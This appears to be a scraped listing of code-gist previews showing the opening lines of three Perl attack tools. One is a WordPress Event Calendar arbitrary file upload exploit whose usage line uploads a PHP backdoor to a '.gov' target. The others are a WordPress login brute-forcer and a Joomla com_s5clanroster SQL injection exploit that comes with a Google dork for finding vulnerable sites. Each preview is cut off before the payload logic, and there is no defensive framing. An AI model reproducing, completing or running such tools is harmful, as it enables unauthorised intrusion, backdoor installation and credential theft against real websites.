This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
#EXPLOIT: http://www.exploit4arab.net/exploits/1433 | |
use LWP::UserAgent; | |
use strict; | |
use warnings; | |
sub banner { | |
print "[!] [ EXPLOIT NAME ]: Wordpress event Calendar Plugin - (AFU)Arbitrary File Upload / EDIT GoogleINURL\n"; | |
print "[!] [ usage ]: perl $0 www.target.gov.crot backdoor.php.gif\n"; | |
print "--------------------------------------------------------------------------------------------------------------------\n"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
# WP-BRUTE BY DPR | |
# dreadpiratesr | |
use LWP::UserAgent; | |
$site = $ARGV[0]; | |
$user = $ARGV[1]; | |
$wordl = $ARGV[2]; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
#Exploit title: Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit | |
#Google Dork: inurl:index.php?option=com_s5clanroster& | |
#Vendor HomePage: http://www.joomla.org/ | |
system("clear"); | |
system("cls"); | |
print "=========================================================\n"; | |
print "* Joomla S5 Clan Roster com_s5clanroster SQL Injection *\n"; | |
print "* Coded dreadpiratesr *\n"; | |
print "* *\n"; |
OlderNewer